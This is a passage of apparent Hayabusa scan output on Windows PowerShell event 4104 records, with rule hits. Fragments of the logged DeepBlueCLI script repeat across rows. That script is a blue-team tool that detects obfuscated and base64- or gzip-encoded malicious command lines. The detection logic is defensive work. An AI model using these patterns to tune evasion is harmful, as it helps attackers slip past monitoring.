powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.569 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:40:20.572 